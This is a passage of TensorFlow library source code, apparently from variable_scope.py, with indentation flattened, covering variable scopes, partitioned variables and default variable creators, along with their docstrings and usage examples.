If initializer is `None` (the default), the default initializer passed in
the constructor is used. If that one is `None` too, we use a new
`glorot_uniform_initializer`. If initializer is a Tensor, we use
it as a value and derive the shape from the initializer.
If the initializer is a callable, then it will be called for each
shard. Otherwise the initializer should match the shape of the entire
sharded Variable, and it will be sliced accordingly for each shard.
Some useful partitioners are available. See, e.g.,
`variable_axis_size_partitioner` and `min_max_variable_partitioner`.
Args:
name: The name of the new or existing variable.
shape: Shape of the new or existing variable.
dtype: Type of the new or existing variable (defaults to `DT_FLOAT`).
initializer: Initializer for the variable if one is created.
regularizer: A (Tensor -> Tensor or None) function; the result of applying
it on a newly created variable will be added to the collection
GraphKeys.REGULARIZATION_LOSSES and can be used for regularization.
trainable: If `True` also add the variable to the graph collection
`GraphKeys.TRAINABLE_VARIABLES` (see `tf.Variable`).
collections: List of graph collections keys to add the Variable to. Defaults
to `[GraphKeys.GLOBAL_VARIABLES]` (see `tf.Variable`).
caching_device: Optional device string or function describing where the
Variable should be cached for reading. Defaults to the Variable's device.
If not `None`, caches on another device. Typical use is to cache on the
device where the Ops using the Variable reside, to deduplicate copying
through `Switch` and other conditional statements.
partitioner: Optional callable that accepts a fully defined `TensorShape`
and `dtype` of the Variable to be created, and returns a list of
partitions for each axis (currently only one axis can be partitioned).
validate_shape: If False, allows the variable to be initialized with a value
of unknown shape. If True, the default, the shape of initial_value must be
known.
use_resource: If False, creates a regular Variable. If True, creates an
experimental ResourceVariable instead which has well-defined semantics.
Defaults to False (will later change to True).
constraint: An optional projection function to be applied to the variable
after being updated by an `Optimizer` (e.g. used to implement norm
constraints or value constraints for layer weights). The function must
take as input the unprojected Tensor representing the value of the
variable and return the Tensor for the projected value (which must have
the same shape). Constraints are not safe to use when doing asynchronous
distributed training.
synchronization: Indicates when a distributed a variable will be aggregated.
Accepted values are constants defined in the class
`tf.VariableSynchronization`. By default the synchronization is set to
`AUTO` and the current `DistributionStrategy` chooses when to synchronize.
aggregation: Indicates how a distributed variable will be aggregated.
Accepted values are constants defined in the class
`tf.VariableAggregation`.
Returns:
A tuple `(shards, partitions)` where `shards` is the list of `Variable`
shards and `partitions` is the output of the partitioner on the input
shape.
Raises:
ValueError: when creating a new variable and shape is not declared,
or when violating reuse during variable creation. Reuse is set inside
`variable_scope`.
"""
# pylint: disable=protected-access
scope = get_variable_scope()
if scope.custom_getter is not None:
raise ValueError(
"Private access to _get_partitioned_variable is not allowed when "
"a custom getter is set. Current custom getter: %s. "
"It is likely that you're using create_partitioned_variables. "
"If so, consider instead using get_variable with a non-empty "
"partitioner parameter instead." % scope.custom_getter)
return scope._get_partitioned_variable(
_get_default_variable_store(),
name,
shape=shape,
dtype=dtype,
initializer=initializer,
regularizer=regularizer,
trainable=trainable,
collections=collections,
caching_device=caching_device,
partitioner=partitioner,
validate_shape=validate_shape,
use_resource=use_resource,
constraint=constraint,
synchronization=synchronization,
aggregation=aggregation)
# pylint: enable=protected-access
# Named like a function for compatibility with the previous
# @tf_contextlib.contextmanager definition.
class _pure_variable_scope(object): # pylint: disable=invalid-name
"""A context for the variable_scope, see `variable_scope` for docs."""
def __init__(self,
name_or_scope,
reuse=None,
initializer=None,
regularizer=None,
caching_device=None,
partitioner=None,
custom_getter=None,
old_name_scope=None,
dtype=dtypes.float32,
use_resource=None,
constraint=None):
"""Creates a context for the variable_scope, see `variable_scope` for docs.
Note: this does not create a name scope.
Args:
name_or_scope: `string` or `VariableScope`: the scope to open.
reuse: `True` or None, or tf.compat.v1.AUTO_REUSE; if `None`, we inherit
the parent scope's reuse flag.
initializer: default initializer for variables within this scope.
regularizer: default regularizer for variables within this scope.
caching_device: default caching device for variables within this scope.
partitioner: default partitioner for variables within this scope.
custom_getter: default custom getter for variables within this scope.
old_name_scope: the original name scope when re-entering a variable scope.
dtype: type of the variables within this scope (defaults to `DT_FLOAT`).
use_resource: If False, variables in this scope will be regular Variables.
If True, experimental ResourceVariables will be creates instead, with
well-defined semantics. Defaults to False (will later change to True).
constraint: An optional projection function to be applied to the variable
after being updated by an `Optimizer` (e.g. used to implement norm
constraints or value constraints for layer weights). The function must
take as input the unprojected Tensor representing the value of the
variable and return the Tensor for the projected value (which must have
the same shape). Constraints are not safe to use when doing asynchronous
distributed training.
"""
self._name_or_scope = name_or_scope
self._reuse = reuse
self._initializer = initializer
self._regularizer = regularizer
self._caching_device = caching_device
self._partitioner = partitioner
self._custom_getter = custom_getter
self._old_name_scope = old_name_scope
self._dtype = dtype
self._use_resource = use_resource
self._constraint = constraint
self._var_store = _get_default_variable_store()
self._var_scope_store = get_variable_scope_store()
self._last_variable_scope_object = None
if isinstance(self._name_or_scope, VariableScope):
self._new_name = self._name_or_scope.name
name_scope = self._name_or_scope._name_scope # pylint: disable=protected-access
# Handler for the case when we jump to a shared scope. We create a new
# VariableScope (self._var_scope_object) that contains a copy of the
# provided shared scope, possibly with changed reuse and initializer, if
# the user requested this.
variable_scope_object = VariableScope(
self._name_or_scope.reuse if not self._reuse else self._reuse,
name=self._new_name,
initializer=self._name_or_scope.initializer,
regularizer=self._name_or_scope.regularizer,
caching_device=self._name_or_scope.caching_device,
partitioner=self._name_or_scope.partitioner,
dtype=self._name_or_scope.dtype,
custom_getter=self._name_or_scope.custom_getter,
name_scope=name_scope,
use_resource=self._name_or_scope.use_resource,
constraint=self._constraint)
if self._initializer is not None:
variable_scope_object.set_initializer(self._initializer)
if self._regularizer is not None:
variable_scope_object.set_regularizer(self._regularizer)
if self._caching_device is not None:
variable_scope_object.set_caching_device(self._caching_device)
if self._partitioner is not None:
variable_scope_object.set_partitioner(self._partitioner)
if self._custom_getter is not None:
variable_scope_object.set_custom_getter(
_maybe_wrap_custom_getter(self._custom_getter,
self._name_or_scope.custom_getter))
if self._dtype is not None:
variable_scope_object.set_dtype(self._dtype)
if self._use_resource is not None:
variable_scope_object.set_use_resource(self._use_resource)
self._cached_variable_scope_object = variable_scope_object
def __enter__(self):
"""Begins the scope block.
Returns:
A VariableScope.
Raises:
ValueError: when trying to reuse within a create scope, or create within
a reuse scope, or if reuse is not `None` or `True`.
TypeError: when the types of some arguments are not appropriate.
"""
self._old = self._var_scope_store.current_scope
if isinstance(self._name_or_scope, VariableScope):
self._var_scope_store.open_variable_scope(self._new_name)
self._old_subscopes = copy.copy(
self._var_scope_store.variable_scopes_count)
variable_scope_object = self._cached_variable_scope_object
else:
# Handler for the case when we just prolong current variable scope.
# VariableScope with name extended by the provided one, and inherited
# reuse and initializer (except if the user provided values to set).
self._new_name = (
self._old.name + "/" +
self._name_or_scope if self._old.name else self._name_or_scope)
self._reuse = (self._reuse or
self._old.reuse) # Re-using is inherited by sub-scopes.
if self._old_name_scope is None:
name_scope = self._name_or_scope
else:
name_scope = self._old_name_scope
variable_scope_object = VariableScope(
self._reuse,
name=self._new_name,
initializer=self._old.initializer,
regularizer=self._old.regularizer,
caching_device=self._old.caching_device,
partitioner=self._old.partitioner,
dtype=self._old.dtype,
use_resource=self._old.use_resource,
custom_getter=self._old.custom_getter,
name_scope=name_scope,
constraint=self._constraint)
if self._initializer is not None:
variable_scope_object.set_initializer(self._initializer)
if self._regularizer is not None:
variable_scope_object.set_regularizer(self._regularizer)
if self._caching_device is not None:
variable_scope_object.set_caching_device(self._caching_device)
if self._partitioner is not None:
variable_scope_object.set_partitioner(self._partitioner)
if self._custom_getter is not None:
variable_scope_object.set_custom_getter(
_maybe_wrap_custom_getter(self._custom_getter,
self._old.custom_getter))
if self._dtype is not None:
variable_scope_object.set_dtype(self._dtype)
if self._use_resource is not None:
variable_scope_object.set_use_resource(self._use_resource)
self._var_scope_store.open_variable_scope(self._new_name)
self._var_scope_store.current_scope = variable_scope_object
self._last_variable_scope_object = variable_scope_object
return variable_scope_object
def __exit__(self, type_arg, value_arg, traceback_arg):
if (self._var_scope_store.current_scope is
not self._last_variable_scope_object):
raise RuntimeError("Improper nesting of variable_scope.")
# If jumping out from a non-prolonged scope, restore counts.
if isinstance(self._name_or_scope, VariableScope):
self._var_scope_store.variable_scopes_count = self._old_subscopes
else:
self._var_scope_store.close_variable_subscopes(self._new_name)
self._var_scope_store.current_scope = self._old
def _maybe_wrap_custom_getter(custom_getter, old_getter):
"""Wrap a call to a custom_getter to use the old_getter internally."""
if old_getter is None:
return custom_getter
# The new custom_getter should call the old one
def wrapped_custom_getter(getter, *args, **kwargs):
# Call:
# custom_getter(
# lambda: old_getter(true_getter, ...), *args, **kwargs)
# which means custom_getter will call old_getter, which
# will call the true_getter, perform any intermediate
# processing, and return the results to the current
# getter, which will also perform additional processing.
return custom_getter(functools.partial(old_getter, getter), *args, **kwargs)
return wrapped_custom_getter
def _get_unique_variable_scope(prefix):
"""Get a name with the given prefix unique in the current variable scope."""
var_scope_store = get_variable_scope_store()
current_scope = get_variable_scope()
name = current_scope.name + "/" + prefix if current_scope.name else prefix
if var_scope_store.variable_scope_count(name) == 0:
return prefix
idx = 1
while var_scope_store.variable_scope_count(name + ("_%d" % idx)) > 0:
idx += 1
return prefix + ("_%d" % idx)
# Named like a function for backwards compatibility with the
# @tf_contextlib.contextmanager version, which was switched to a class to avoid
# some object creation overhead.
@tf_export(v1=["variable_scope"]) # pylint: disable=invalid-name
class variable_scope(object):
"""A context manager for defining ops that creates variables (layers).
This context manager validates that the (optional) `values` are from the same
graph, ensures that graph is the default graph, and pushes a name scope and a
variable scope.
If `name_or_scope` is not None, it is used as is. If `name_or_scope` is None,
then `default_name` is used. In that case, if the same name has been
previously used in the same scope, it will be made unique by appending `_N`
to it.
Variable scope allows you to create new variables and to share already created
ones while providing checks to not create or share by accident. For details,
see the [Variable Scope How To](https://tensorflow.org/guide/variables), here
we present only a few basic examples.
Simple example of how to create a new variable:
```python
with tf.compat.v1.variable_scope("foo"):
with tf.compat.v1.variable_scope("bar"):
v = tf.compat.v1.get_variable("v", [1])
assert v.name == "foo/bar/v:0"
```
Simple example of how to reenter a premade variable scope safely:
```python
with tf.compat.v1.variable_scope("foo") as vs:
pass
# Re-enter the variable scope.
with tf.compat.v1.variable_scope(vs,
auxiliary_name_scope=False) as vs1:
# Restore the original name_scope.
with tf.name_scope(vs1.original_name_scope):
v = tf.compat.v1.get_variable("v", [1])
assert v.name == "foo/v:0"
c = tf.constant([1], name="c")
assert c.name == "foo/c:0"
```
Keep in mind that the counters for `default_name` are discarded once the
parent scope is exited. Therefore when the code re-enters the scope (for
instance by saving it), all nested default_name counters will be restarted.
For instance:
```python
with tf.compat.v1.variable_scope("foo") as vs:
with tf.compat.v1.variable_scope(None, default_name="bar"):
v = tf.compat.v1.get_variable("a", [1])
assert v.name == "foo/bar/a:0", v.name
with tf.compat.v1.variable_scope(None, default_name="bar"):
v = tf.compat.v1.get_variable("b", [1])
assert v.name == "foo/bar_1/b:0"
with tf.compat.v1.variable_scope(vs):
with tf.compat.v1.variable_scope(None, default_name="bar"):
v = tf.compat.v1.get_variable("c", [1])
assert v.name == "foo/bar/c:0" # Uses bar instead of bar_2!
```
Basic example of sharing a variable AUTO_REUSE:
```python
def foo():
with tf.compat.v1.variable_scope("foo", reuse=tf.compat.v1.AUTO_REUSE):
v = tf.compat.v1.get_variable("v", [1])
return v
v1 = foo() # Creates v.
v2 = foo() # Gets the same, existing v.
assert v1 == v2
```
Basic example of sharing a variable with reuse=True:
```python
with tf.compat.v1.variable_scope("foo"):
v = tf.compat.v1.get_variable("v", [1])
with tf.compat.v1.variable_scope("foo", reuse=True):
v1 = tf.compat.v1.get_variable("v", [1])
assert v1 == v
```
Sharing a variable by capturing a scope and setting reuse:
```python
with tf.compat.v1.variable_scope("foo") as scope:
v = tf.compat.v1.get_variable("v", [1])
scope.reuse_variables()
v1 = tf.compat.v1.get_variable("v", [1])
assert v1 == v
```
To prevent accidental sharing of variables, we raise an exception when getting
an existing variable in a non-reusing scope.
```python
with tf.compat.v1.variable_scope("foo"):
v = tf.compat.v1.get_variable("v", [1])
v1 = tf.compat.v1.get_variable("v", [1])
# Raises ValueError("... v already exists ...").
```
Similarly, we raise an exception when trying to get a variable that does not
exist in reuse mode.
```python
with tf.compat.v1.variable_scope("foo", reuse=True):
v = tf.compat.v1.get_variable("v", [1])
# Raises ValueError("... v does not exists ...").
```
Note that the `reuse` flag is inherited: if we open a reusing scope, then all
its sub-scopes become reusing as well.
A note about name scoping: Setting `reuse` does not impact the naming of other
ops such as mult. See related discussion on
[github#6189](https://github.com/tensorflow/tensorflow/issues/6189)
Note that up to and including version 1.0, it was allowed (though explicitly
discouraged) to pass False to the reuse argument, yielding undocumented
behaviour slightly different from None. Starting at 1.1.0 passing None and
False as reuse has exactly the same effect.
A note about using variable scopes in multi-threaded environment: Variable
scopes are thread local, so one thread will not see another thread's current
scope. Also, when using `default_name`, unique scopes names are also generated
only on a per thread basis. If the same name was used within a different
thread, that doesn't prevent a new thread from creating the same scope.
However, the underlying variable store is shared across threads (within the
same graph). As such, if another thread tries to create a new variable with
the same name as a variable created by a previous thread, it will fail unless
reuse is True.
Further, each thread starts with an empty variable scope. So if you wish to
preserve name prefixes from a scope from the main thread, you should capture
the main thread's scope and re-enter it in each thread. For e.g.
```
main_thread_scope = variable_scope.get_variable_scope()
# Thread's target function:
def thread_target_fn(captured_scope):
with variable_scope.variable_scope(captured_scope):
# .... regular code for this thread
thread = threading.Thread(target=thread_target_fn, args=(main_thread_scope,))
```
"""
def __init__(self,
name_or_scope,
default_name=None,
values=None,
initializer=None,
regularizer=None,
caching_device=None,
partitioner=None,
custom_getter=None,
reuse=None,
dtype=None,
use_resource=None,
constraint=None,
auxiliary_name_scope=True):
"""Initialize the context manager.
Args:
name_or_scope: `string` or `VariableScope`: the scope to open.
default_name: The default name to use if the `name_or_scope` argument is
`None`, this name will be uniquified. If name_or_scope is provided it
won't be used and therefore it is not required and can be None.
values: The list of `Tensor` arguments that are passed to the op function.
initializer: default initializer for variables within this scope.
regularizer: default regularizer for variables within this scope.
caching_device: default caching device for variables within this scope.
partitioner: default partitioner for variables within this scope.
custom_getter: default custom getter for variables within this scope.
reuse: `True`, None, or tf.compat.v1.AUTO_REUSE; if `True`, we go into
reuse mode for this scope as well as all sub-scopes; if
tf.compat.v1.AUTO_REUSE, we create variables if they do not exist, and
return them otherwise; if None, we inherit the parent scope's reuse
flag. When eager execution is enabled, new variables are always created
unless an EagerVariableStore or template is currently active.
dtype: type of variables created in this scope (defaults to the type in
the passed scope, or inherited from parent scope).
use_resource: If False, all variables will be regular Variables. If True,
experimental ResourceVariables with well-defined semantics will be used
instead. Defaults to False (will later change to True). When eager
execution is enabled this argument is always forced to be True.
constraint: An optional projection function to be applied to the variable
after being updated by an `Optimizer` (e.g. used to implement norm
constraints or value constraints for layer weights). The function must
take as input the unprojected Tensor representing the value of the
variable and return the Tensor for the projected value (which must have
the same shape). Constraints are not safe to use when doing asynchronous
distributed training.
auxiliary_name_scope: If `True`, we create an auxiliary name scope with
the scope. If `False`, we don't create it. Note that the argument is not
inherited, and it only takes effect for once when creating. You should
only use it for re-entering a premade variable scope.
Returns:
A scope that can be captured and reused.
Raises:
ValueError: when trying to reuse within a create scope, or create within
a reuse scope.
TypeError: when the types of some arguments are not appropriate.
"""
self._name_or_scope = name_or_scope
self._default_name = default_name
self._values = values
self._initializer = initializer
self._regularizer = regularizer
self._caching_device = caching_device
self._partitioner = partitioner
self._custom_getter = custom_getter
self._reuse = reuse
self._dtype = dtype
self._use_resource = use_resource
self._constraint = constraint
if self._default_name is None and self._name_or_scope is None:
raise TypeError("If default_name is None then name_or_scope is required")
if self._reuse is False:
# We don't allow non-inheriting scopes, False = None here.
self._reuse = None
if not (self._reuse is True
or self._reuse is None
or self._reuse is AUTO_REUSE):
raise ValueError("The reuse parameter must be True or False or None.")
if self._values is None:
self._values = []
self._in_graph_mode = not context.executing_eagerly()
if self._in_graph_mode:
self._graph = ops._get_graph_from_inputs(self._values) # pylint: disable=protected-access
self._cached_pure_variable_scope = None
self._current_name_scope = None
if not isinstance(auxiliary_name_scope, bool):
raise TypeError("The auxiliary_name_scope must be `True` or `False`, "
"while get {}".format(auxiliary_name_scope))
self._auxiliary_name_scope = auxiliary_name_scope
def __enter__(self):
# If the default graph is building a function, then we should not replace it
# with the cached graph.
if ops.get_default_graph().building_function:
self._building_function = True
else:
self._building_function = False
if self._in_graph_mode and not self._building_function:
self._graph_context_manager = self._graph.as_default()
self._graph_context_manager.__enter__()
if self._cached_pure_variable_scope is not None:
# Fast path for re-entering variable_scopes. We've held on to the pure
# variable scope from a previous successful __enter__, so we avoid some
# overhead by re-using that object.
if self._current_name_scope is not None:
self._current_name_scope.__enter__()
return self._cached_pure_variable_scope.__enter__()
try:
return self._enter_scope_uncached()
except:
if (self._in_graph_mode and not self._building_function and
self._graph_context_manager is not None):
self._graph_context_manager.__exit__(*sys.exc_info())
raise
def _enter_scope_uncached(self):
"""Enters the context manager when there is no cached scope yet.
Returns:
The entered variable scope.
Raises:
TypeError: A wrong type is passed as `scope` at __init__().
ValueError: `reuse` is incorrectly set at __init__().
"""
if self._auxiliary_name_scope:
# Create a new name scope later
current_name_scope = None
else:
# Reenter the current name scope
name_scope = ops.get_name_scope()
if name_scope:
# Hack to reenter
name_scope += "/"
current_name_scope = ops.name_scope(name_scope, skip_on_eager=False)
else:
# Root scope
current_name_scope = ops.name_scope(name_scope, skip_on_eager=False)
# IMPORTANT: Only assign to self._cached_pure_variable_scope and
# self._current_name_scope after successful __enter__() calls.
if self._name_or_scope is not None:
if not isinstance(self._name_or_scope,
(VariableScope,) + six.string_types):
raise TypeError("VariableScope: name_or_scope must be a string or "
"VariableScope.")
if isinstance(self._name_or_scope, six.string_types):
name_scope = self._name_or_scope
else:
name_scope = self._name_or_scope.name.split("/")[-1]
if name_scope or current_name_scope:
current_name_scope = current_name_scope or ops.name_scope(
name_scope, skip_on_eager=False)
try:
current_name_scope_name = current_name_scope.__enter__()
except:
current_name_scope.__exit__(*sys.exc_info())
raise
self._current_name_scope = current_name_scope
if isinstance(self._name_or_scope, six.string_types):
old_name_scope = current_name_scope_name
else:
old_name_scope = self._name_or_scope.original_name_scope
pure_variable_scope = _pure_variable_scope(
self._name_or_scope,
reuse=self._reuse,
initializer=self._initializer,
regularizer=self._regularizer,
caching_device=self._caching_device,
partitioner=self._partitioner,
custom_getter=self._custom_getter,
old_name_scope=old_name_scope,
dtype=self._dtype,
use_resource=self._use_resource,
constraint=self._constraint)
try:
entered_pure_variable_scope = pure_variable_scope.__enter__()
except:
pure_variable_scope.__exit__(*sys.exc_info())
raise
self._cached_pure_variable_scope = pure_variable_scope
return entered_pure_variable_scope
else:
self._current_name_scope = None
# This can only happen if someone is entering the root variable scope.
pure_variable_scope = _pure_variable_scope(
self._name_or_scope,
reuse=self._reuse,
initializer=self._initializer,
regularizer=self._regularizer,
caching_device=self._caching_device,
partitioner=self._partitioner,
custom_getter=self._custom_getter,
dtype=self._dtype,
use_resource=self._use_resource,
constraint=self._constraint)
try:
entered_pure_variable_scope = pure_variable_scope.__enter__()
except:
pure_variable_scope.__exit__(*sys.exc_info())
raise
self._cached_pure_variable_scope = pure_variable_scope
return entered_pure_variable_scope
else: # Here name_or_scope is None. Using default name, but made unique.
if self._reuse:
raise ValueError("reuse=True cannot be used without a name_or_scope")
current_name_scope = current_name_scope or ops.name_scope(
self._default_name, skip_on_eager=False)
try:
current_name_scope_name = current_name_scope.__enter__()
except:
current_name_scope.__exit__(*sys.exc_info())
raise
self._current_name_scope = current_name_scope
unique_default_name = _get_unique_variable_scope(self._default_name)
pure_variable_scope = _pure_variable_scope(
unique_default_name,
initializer=self._initializer,
regularizer=self._regularizer,
caching_device=self._caching_device,
partitioner=self._partitioner,
custom_getter=self._custom_getter,
old_name_scope=current_name_scope_name,
dtype=self._dtype,
use_resource=self._use_resource,
constraint=self._constraint)
try:
entered_pure_variable_scope = pure_variable_scope.__enter__()
except:
pure_variable_scope.__exit__(*sys.exc_info())
raise
self._cached_pure_variable_scope = pure_variable_scope
return entered_pure_variable_scope
def __exit__(self, type_arg, value_arg, traceback_arg):
try:
self._cached_pure_variable_scope.__exit__(type_arg, value_arg,
traceback_arg)
finally:
try:
if self._current_name_scope:
self._current_name_scope.__exit__(type_arg, value_arg,
traceback_arg)
finally:
if self._in_graph_mode and not self._building_function:
self._graph_context_manager.__exit__(type_arg, value_arg,
traceback_arg)
# pylint: disable=g-doc-return-or-yield
@tf_export(v1=["variable_op_scope"])
@tf_contextlib.contextmanager
def variable_op_scope(values,
name_or_scope,
default_name=None,
initializer=None,
regularizer=None,
caching_device=None,
partitioner=None,
custom_getter=None,
reuse=None,
dtype=None,
use_resource=None,
constraint=None):
"""Deprecated: context manager for defining an op that creates variables."""
logging.warn("tf.variable_op_scope(values, name, default_name) is deprecated,"
" use tf.variable_scope(name, default_name, values)")
with variable_scope(
name_or_scope,
default_name=default_name,
values=values,
initializer=initializer,
regularizer=regularizer,
caching_device=caching_device,
partitioner=partitioner,
custom_getter=custom_getter,
reuse=reuse,
dtype=dtype,
use_resource=use_resource,
constraint=constraint) as scope:
yield scope
def _call_partitioner(partitioner, shape, dtype):
"""Call partitioner validating its inputs/output.
Args:
partitioner: a function mapping `Tensor` shape and dtype to a list of
partitions.
shape: shape of the `Tensor` to partition, must have at least two
dimensions.
dtype: dtype of the elements in the `Tensor`.
Returns:
A list with elements >=1 and exactly one >1. The index of that
element corresponds to the partitioning axis.
"""
if not shape.is_fully_defined():
raise ValueError("Shape of a new partitioned variable must be "
"fully defined, but instead was %s." % (shape,))
if shape.ndims < 1:
raise ValueError("A partitioned Variable must have rank at least 1, "
"shape: %s" % shape)
slicing = partitioner(shape=shape, dtype=dtype)
if not isinstance(slicing, collections_abc.Sequence):
raise ValueError("Partitioner must return a sequence, but saw: %s" %
slicing)
if len(slicing) != shape.ndims:
raise ValueError(
"Partitioner returned a partition list that does not match the "
"Variable's rank: %s vs. %s" % (slicing, shape))
if any(p < 1 for p in slicing):
raise ValueError("Partitioner returned zero partitions for some axes: %s" %
slicing)
if sum(p > 1 for p in slicing) > 1:
raise ValueError("Can only slice a variable along one dimension: "
"shape: %s, partitioning: %s" % (shape, slicing))
return slicing
# TODO(slebedev): could be inlined, but
# `_VariableStore._get_partitioned_variable` is too complex even
# without this logic.
def _get_slice_dim_and_num_slices(slicing):
"""Get slicing dimension and number of slices from the partitioner output."""
for slice_dim, num_slices in enumerate(slicing):
if num_slices > 1:
break
else:
# Degenerate case: no partitioning applied.
slice_dim = 0
num_slices = 1
return slice_dim, num_slices
def _iter_slices(full_shape, num_slices, slice_dim):
"""Slices a given a shape along the specified dimension."""
num_slices_with_excess = full_shape[slice_dim] % num_slices
offset = [0] * len(full_shape)
min_slice_len = full_shape[slice_dim] // num_slices
for i in xrange(num_slices):
shape = full_shape[:]
shape[slice_dim] = min_slice_len + bool(i < num_slices_with_excess)
yield offset[:], shape
offset[slice_dim] += shape[slice_dim]
def default_variable_creator(next_creator=None, **kwargs):
"""Default variable creator."""
assert next_creator is None
initial_value = kwargs.get("initial_value", None)
trainable = kwargs.get("trainable", None)
collections = kwargs.get("collections", None)
validate_shape = kwargs.get("validate_shape", True)
caching_device = kwargs.get("caching_device", None)
name = kwargs.get("name", None)
variable_def = kwargs.get("variable_def", None)
dtype = kwargs.get("dtype", None)
expected_shape = kwargs.get("expected_shape", None)
import_scope = kwargs.get("import_scope", None)
constraint = kwargs.get("constraint", None)
use_resource = kwargs.get("use_resource", None)
synchronization = kwargs.get("synchronization", None)
aggregation = kwargs.get("aggregation", None)
shape = kwargs.get("shape", None)
if use_resource is None:
use_resource = get_variable_scope().use_resource
if use_resource is None:
use_resource = _DEFAULT_USE_RESOURCE
use_resource = use_resource or context.executing_eagerly()
if use_resource:
distribute_strategy = kwargs.get("distribute_strategy", None)
return resource_variable_ops.ResourceVariable(
initial_value=initial_value,
trainable=trainable,
collections=collections,
validate_shape=validate_shape,
caching_device=caching_device,
name=name,
dtype=dtype,
constraint=constraint,
variable_def=variable_def,
import_scope=import_scope,
distribute_strategy=distribute_strategy,
synchronization=synchronization,
aggregation=aggregation,
shape=shape)
else:
return variables.RefVariable(
initial_value=initial_value,
trainable=trainable,
collections=collections,
validate_shape=validate_shape,
caching_device=caching_device,
name=name,
dtype=dtype,
constraint=constraint,
variable_def=variable_def,
expected_shape=expected_shape,
import_scope=import_scope,
synchronization=synchronization,
aggregation=aggregation,
shape=shape)
def default_variable_creator_v2(next_creator=None, **kwargs):
"""Default variable creator."""
assert next_creator is None
initial_value = kwargs.get("initial_value", None)
trainable = kwargs.get("trainable", None)
validate_shape = kwargs.get("validate_shape", True)
caching_device = kwargs.get("caching_device", None)
name = kwargs.get("name", None)
variable_def = kwargs.get("variable_def", None)
dtype = kwargs.get("dtype", None)
import_scope = kwargs.get("import_scope", None)
constraint = kwargs.get("constraint", None)
distribute_strategy = kwargs.get("distribute_strategy", None)
synchronization = kwargs.get("synchronization", None)
aggregation = kwargs.get("aggregation", None)
shape = kwargs.get("shape", None)
return resource_variable_ops.ResourceVariable(
initial_value=initial_value,
trainable=trainable,
validate_shape=validate_shape,
caching_device=caching_device,
name=name,
dtype=dtype,
constraint=constraint,
variable_def=variable_def,
import_scope=import_scope,
distribute_strategy=distribute_strategy,
synchronization=synchronization,
aggregation=aggregation,
shape=shape)
variables.default_variable_creator = default_variable_creator
variables.default_variable_creator_v2 = default_variable_creator_v2
def _make_getter(captured_getter, captured_previous):
"""Gets around capturing loop variables in python being broken."""
return lambda **kwargs: captured_getter(captured_previous, **kwargs)
# TODO(apassos) remove forwarding symbol
variable = variables.VariableV1
@tf_export(v1=["variable_creator_scope"])
@tf_contextlib.contextmanager
def variable_creator_scope_v1(variable_creator):
"""Scope which defines a variable creation function to be used by variable().
variable_creator is expected to be a function with the following signature:
```
def variable_creator(next_creator, **kwargs)
```
The creator is supposed to eventually call the next_creator to create a
variable if it does want to create a variable and not call Variable or
ResourceVariable directly. This helps make creators composable. A creator may
choose to create multiple variables, return already existing variables, or
simply register that a variable was created and defer to the next creators in
line. Creators can also modify the keyword arguments seen by the next
creators.
Custom getters in the variable scope will eventually resolve down to these
custom creators when they do create variables.
The valid keyword arguments in kwds are:
* initial_value: A `Tensor`, or Python object convertible to a `Tensor`,
which is the initial value for the Variable. The initial value must have
a shape specified unless `validate_shape` is set to False. Can also be a
callable with no argument that returns the initial value when called. In
that case, `dtype` must be specified. (Note that initializer functions
from init_ops.py must first be bound to a shape before being used here.)
* trainable: If `True`, the default, also adds the variable to the graph
collection `GraphKeys.TRAINABLE_VARIABLES`. This collection is used as
the default list of variables to use by the `Optimizer` classes.
`trainable` defaults to `True`, unless `synchronization` is
set to `ON_READ`, in which case it defaults to `False`.
* collections: List of graph collections keys. The new variable is added to
these collections. Defaults to `[GraphKeys.GLOBAL_VARIABLES]`.
* validate_shape: If `False`, allows the variable to be initialized with a
value of unknown shape. If `True`, the default, the shape of
`initial_value` must be known.
* caching_device: Optional device string describing where the Variable
should be cached for reading. Defaults to the Variable's device.
If not `None`, caches on another device. Typical use is to cache
on the device where the Ops using the Variable reside, to deduplicate
copying through `Switch` and other conditional statements.
* name: Optional name for the variable. Defaults to `'Variable'` and gets
uniquified automatically.
* dtype: If set, initial_value will be converted to the given type.
If `None`, either the datatype will be kept (if `initial_value` is
a Tensor), or `convert_to_tensor` will decide.
* constraint: A constraint function to be applied to the variable after
updates by some algorithms.
* use_resource: if True, a ResourceVariable is always created.
* synchronization: Indicates when a distributed a variable will be
aggregated. Accepted values are constants defined in the class
`tf.VariableSynchronization`. By default the synchronization is set to
`AUTO` and the current `DistributionStrategy` chooses
when to synchronize.
* aggregation: Indicates how a distributed variable will be aggregated.
Accepted values are constants defined in the class
`tf.VariableAggregation`.
This set may grow over time, so it's important the signature of creators is as
mentioned above.
Args:
variable_creator: the passed creator
Yields:
A scope in which the creator is active
"""
with ops.get_default_graph()._variable_creator_scope(variable_creator): # pylint: disable=protected-access
yield
# Note: only the docstrings differ between this and v1.
@tf_export("variable_creator_scope", v1=[])
@tf_contextlib.contextmanager
def variable_creator_scope(variable_creator):
"""Scope which defines a variable creation function to be used by variable().
variable_creator is expected to be a function with the following signature:
```
def variable_creator(next_creator, **kwargs)
```
The creator is supposed to eventually call the next_creator to create a
variable if it does want to create a variable and not call Variable or
ResourceVariable directly. This helps make creators composable. A creator may
choose to create multiple variables, return already existing variables, or
simply register that a variable was created and defer to the next creators in
line. Creators can also modify the keyword arguments seen by the next
creators.
Custom getters in the variable scope will eventually resolve down to these
custom creators when they do create variables.
The valid keyword arguments in kwds are:
* initial_value: A `Tensor`, or Python object convertible to a `Tensor`,
which is the initial value for the Variable. The initial value must have
a shape specified unless `validate_shape` is set to False. Can also be a
callable with no argument that returns the initial value when called. In
that case, `dtype` must be specified. (Note that initializer functions
from init_ops.py must first be bound to a shape before being used here.)
* trainable: If `True`, the default, GradientTapes automatically watch
uses of this Variable.
* validate_shape: If `False`, allows the variable to be initialized with a
value of unknown shape. If `True`, the default, the shape of
`initial_value` must be known.
* caching_device: Optional device string describing where the Variable
should be cached for reading. Defaults to the Variable's device.
If not `None`, caches on another device. Typical use is to cache
on the device where the Ops using the Variable reside, to deduplicate
copying through `Switch` and other conditional statements.
* name: Optional name for the variable. Defaults to `'Variable'` and gets
uniquified automatically.
dtype: If set, initial_value will be converted to the given type.
If `None`, either the datatype will be kept (if `initial_value` is
a Tensor), or `convert_to_tensor` will decide.
* constraint: A constraint function to be applied to the variable after
updates by some algorithms.
* synchronization: Indicates when a distributed a variable will be
aggregated. Accepted values are constants defined in the class
`tf.VariableSynchronization`. By default the synchronization is set to
`AUTO` and the current `DistributionStrategy` chooses
when to synchronize.
* aggregation: Indicates how a distributed variable will be aggregated.
Accepted values are constants defined in the class
`tf.VariableAggregation`.
